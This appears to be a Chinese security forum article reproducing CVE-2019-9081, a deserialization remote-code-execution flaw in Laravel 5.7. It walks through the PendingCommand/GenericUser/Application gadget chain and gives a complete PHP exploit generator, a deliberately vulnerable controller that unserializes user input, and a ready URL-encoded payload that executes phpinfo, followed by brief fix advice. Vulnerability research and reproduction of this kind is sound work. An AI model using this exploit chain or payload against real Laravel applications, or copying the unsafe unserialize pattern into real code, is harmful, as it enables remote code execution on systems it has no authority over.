查看原文
其他

CVE-2019-9081 Laravel5.7 反序列化 RCE复现

H3h3QAQ 看雪学苑 2022-07-01


本文为看雪论坛优秀文章

看雪论坛作者ID:H3h3QAQ



1


漏洞简介


Laravel Framework 5.7.x版本中的Illuminate组件存在反序列化漏洞,远程攻击者可利用该漏洞执行代码。



2


漏洞影响


Laravel5.7



3


漏洞分析


laravel在5.7之后加入了PendingCommand类,同时发现了两个方法。

PendingCommand类有魔术方法__destruct(),该方法调用run函数,然后run函数执行命令,我们跟进看一下构造方法。

一共需要用到4个属性,我们继续跟进run方法看一下。

注意$this->mockConsoleOutput();我们跟进看一下。

继续跟进createABufferedOutputMock()。

继续走下去,我们需要属性$this->test->expectedOutput。

我们需要找到类中用expectedOutput,经过全局搜索,在Illuminate\Foundation\Testing\Concerns,存在。

 

但是这种类,需要用魔法方法get,来实例化。

 

在vendor/laravel/framework/src/Illuminate/Auth/GenericUser.php中存在可以利用的get方法。

设置键名为expectedOutput的数组,即可利用。在就缺$app参数,我们回去接着跟进run方法。

这里也很重要:

$this->app[Kernel::class]


这里在实例化对象,再去调对应的call方法,跟着Kerne可以看到是在实例化。

Illuminate\Contracts\Console\Kernel


首先进入到:

跟进make方法:


 

跟进父类的make:

跟进resolve:

那么此时发现$concrete的值来自于getConcrete($abstract):

vendor/laravel/framework/src/Illuminate/Container/Container.php


跟进getConcrete:

注意这里:

if (isset($this->bindings[$abstract])) { return $this->bindings[$abstract]['concrete'];}


如果bindings[$abstract]存在,则会返回bindings[$abstract][‘concrete’]。

 

bindings是类Container的属性,并且类Container中也有可以RCE的call方法。

 

到现在,我们可以整理一下思路:

我们可以任意实例化类Container的子类,这样在其子类调用call的时候,会触发类Container的call方法,那么即可达成RCE


我们选择Illuminate\Foundation\Application而$abstract的值为Illuminate\Contracts\Console\Kernel。


那么此时我们容易知道$bindings只要存在键名为Illuminate\Contracts\Console\Kernel的数组,就能进入该if条件句,那么我们只要按如下进行构造:

1.类PendingCommand 利用 destruct触发run()方法2.类vendor/laravel/framework/src/Illuminate/Auth/GenericUser.php 构造数组3.类vendor/laravel/framework/src/Illuminate/Auth/GenericUser.php 利用 get()魔法方法满足mockConsoleOutput4.利用任意实例化对象,实例化Illuminate\Foundation\Application5.调用call触发父类call方法RCE


exp如下:

<?php namespace Illuminate\Foundation\Testing{ class PendingCommand{ protected $command; protected $parameters; protected $app; public $test; public function __construct($command, $parameters,$class,$app){ $this->command = $command; $this->parameters = $parameters; $this->test=$class; $this->app=$app; } }} namespace Illuminate\Auth{ class GenericUser{ protected $attributes; public function __construct(array $attributes){ $this->attributes = $attributes; } }} namespace Illuminate\Foundation{ class Application{ protected $hasBeenBootstrapped = false; protected $bindings; public function __construct($bind){ $this->bindings=$bind; } }} namespace{ $genericuser = new Illuminate\Auth\GenericUser(array("expectedOutput"=>array("0"=>"1"),"expectedQuestions"=>array("0"=>"1"))); $application = new Illuminate\Foundation\Application(array("Illuminate\Contracts\Console\Kernel"=>array("concrete"=>"Illuminate\Foundation\Application"))); $pendingcommand = new Illuminate\Foundation\Testing\PendingCommand("phpinfo",array('1'),$genericuser,$application); echo urlencode(serialize($pendingcommand));}?>



4


漏洞复现


在routes/web.php添加一条路由:

Route::get('/index', 'TaskController@index');


接下来在app/Http/Controllers文件夹下创建文件TaskController.php,源码如下:

<?phpnamespace App\Http\Controllers;highlight_file(__FILE__);class TaskController{ public function index(){ if(isset($_GET['code'])) { $code=$_GET['code']; unserialize($code); return "Welcome to H3'palce"; } }}?>


利用exp生成payload,然后传值过去。


payload:

http://127.0.0.1/public/index.php/index?code=O%3A44%3A%22Illuminate%5CFoundation%5CTesting%5CPendingCommand%22%3A4%3A%7Bs%3A10%3A%22%00%2A%00command%22%3Bs%3A7%3A%22phpinfo%22%3Bs%3A13%3A%22%00%2A%00parameters%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B%7Ds%3A6%3A%22%00%2A%00app%22%3BO%3A33%3A%22Illuminate%5CFoundation%5CApplication%22%3A2%3A%7Bs%3A22%3A%22%00%2A%00hasBeenBootstrapped%22%3Bb%3A0%3Bs%3A11%3A%22%00%2A%00bindings%22%3Ba%3A1%3A%7Bs%3A35%3A%22Illuminate%5CContracts%5CConsole%5CKernel%22%3Ba%3A1%3A%7Bs%3A8%3A%22concrete%22%3Bs%3A33%3A%22Illuminate%5CFoundation%5CApplication%22%3B%7D%7D%7Ds%3A4%3A%22test%22%3BO%3A27%3A%22Illuminate%5CAuth%5CGenericUser%22%3A1%3A%7Bs%3A13%3A%22%00%2A%00attributes%22%3Ba%3A2%3A%7Bs%3A14%3A%22expectedOutput%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B%7Ds%3A17%3A%22expectedQuestions%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B%7D%7D%7D%7D



5


漏洞修复


  • 删除__destruct中的$this->run()代码段

  • 更新到新版本




 


看雪ID:H3h3QAQ

https://bbs.pediy.com/user-home-921448.htm

*本文由看雪论坛 H3h3QAQ 原创,转载请注明来自看雪社区




# 往期推荐

1.某火热区块链游戏(mir4)的一次通信协议分析

2.从分析一个赌球APP中入门安卓逆向、开发、协议分析

3.内核漏洞学习-HEVD-NullPointerDereference

4.一个数据加密恶意样本分析

5.windows64位分页机制分析-隐藏可执行内存方法

6.某系统漏洞挖掘之授权绕过到rce






球分享

球点赞

球在看



点击“阅读原文”,了解更多!

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存